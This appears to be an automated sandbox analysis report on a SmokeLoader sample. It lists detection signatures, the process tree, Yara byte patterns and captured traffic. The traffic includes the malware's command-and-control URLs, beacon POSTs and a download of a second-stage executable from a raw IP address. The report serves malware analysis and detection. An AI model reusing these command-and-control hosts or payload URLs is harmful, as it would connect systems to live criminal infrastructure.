Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	780216
MD5:	635e3f021a205ad3a2bf9aaf3d278251
SHA1:	c4efd1650fe3bde0bcba9ad2772b451b49809ef4
SHA256:	ff69d65d2eacb1bd14db2d94e9dd720aa66a5ef3d108a08d5afe8a3166305617
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Maps a DLL or memory area into another process

Machine Learning detection for sample

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Dropped file seen in connection with other malware

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

file.exe (PID: 3620 cmdline: C:\Users\user\Desktop\file.exe MD5: 635E3F021A205AD3A2BF9AAF3D278251)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

EE5A.exe (PID: 916 cmdline: C:\Users\user\AppData\Local\Temp\EE5A.exe MD5: 49D7D06EB3FD5E1DADAA505C021AA571)

rundll32.exe (PID: 5616 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

F50.exe (PID: 1244 cmdline: C:\Users\user\AppData\Local\Temp\F50.exe MD5: 47D4D75F4D1D3B2C16D375A671BF0FDC)

wdscede (PID: 6128 cmdline: C:\Users\user\AppData\Roaming\wdscede MD5: 635E3F021A205AD3A2BF9AAF3D278251)

F50.exe (PID: 6044 cmdline: "C:\Users\user\AppData\Local\Temp\F50.exe" MD5: 47D4D75F4D1D3B2C16D375A671BF0FDC)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.422927170.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4346:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.567433680.0000000000413000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.568515234.0000000002E8E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1140:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.327713150.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.521464355.0000000004A70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000003.570683568.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.568347439.0000000002E00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.520261780.0000000004997000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.536404249.0000000004830000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.528207435.0000000000413000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.586888838.0000000002C38000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5076:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.586363495.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.534093898.0000000002EA9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1188:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.file.exe.2d30000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.wdscede.2bd0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.file.exe.2c00e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.wdscede.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.F50.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.F50.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10170:$s2: Elevation:Administrator!new:
4.3.wdscede.2be0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.F50.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.F50.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10170:$s2: Elevation:Administrator!new:
Click to see the 5 entries

Snort Signatures

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 211.119.84.112

Timestamp:	192.168.2.4211.119.84.11249697802851815 01/08/23-16:15:21.659638
SID:	2851815
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 58.235.189.192

Timestamp:	192.168.2.458.235.189.19249696802851815 01/08/23-16:15:19.707702
SID:	2851815
Source Port:	49696
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 08 Jan 2023 15:15:22 GMTContent-Type: application/octet-streamContent-Length: 1073152Last-Modified: Sun, 08 Jan 2023 15:10:03 GMTConnection: keep-aliveETag: "63badccb-106000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f7 df 75 fd b3 be 1b ae b3 be 1b ae b3 be 1b ae 0e f1 8d ae b2 be 1b ae ad ec 8e ae af be 1b ae ad ec 98 ae cc be 1b ae 94 78 60 ae b4 be 1b ae b3 be 1a ae 31 be 1b ae ad ec 9f ae 90 be 1b ae ad ec 8f ae b2 be 1b ae ad ec 8a ae b2 be 1b ae 52 69 63 68 b3 be 1b ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 65 09 e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7a 01 00 00 b0 85 02 00 00 00 00 bf 5f 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 02 00 04 00 00 2f c8 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 7d 01 00 50 00 00 00 00 50 85 02 60 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 b7 83 02 00 90 01 00 00 5c 0d 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 84 01 00 00 50 85 02 00 86 01 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nrunfbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://utbgbuc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://laatdiy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: vatra.at
Source: global traffic	HTTP traffic detected: GET /intel.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.135.33.42
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://avjruv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fpmhvdgw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://daffyjk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lubvvjyufy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tklmgewyg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gttbvxrpx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qsmspqgdlg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wgdttq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dotemlc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://utctbvv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tduhcp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mwrunlqeb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://npcojlss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yokcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lrmfyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wemmwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: vatra.at
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ursbcr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: vatra.at

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.135.33.42

Source: explorer.exe, 00000001.00000000.393736698.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.419303004.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.362501774.0000000008260000.00000004.00000001.00020000.00000000.sdmp

String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrunfbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: vatra.at

Source: unknown

DNS traffic detected: queries for: vatra.at

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe

Code function: 5_2_004C9255 InternetReadFile,

5_2_004C9255

Source: global traffic	HTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl
Source: global traffic	HTTP traffic detected: GET /intel.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.135.33.42

Source: unknown

HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49701 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.2bd0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2c00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wdscede.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.wdscede.2be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.327713150.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.570683568.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: F50.exe, 00000006.00000002.533600256.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe

Code function: 5_2_004B99AA CryptImportKey,CryptImportKey,

5_2_004B99AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.F50.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.F50.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.422927170.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
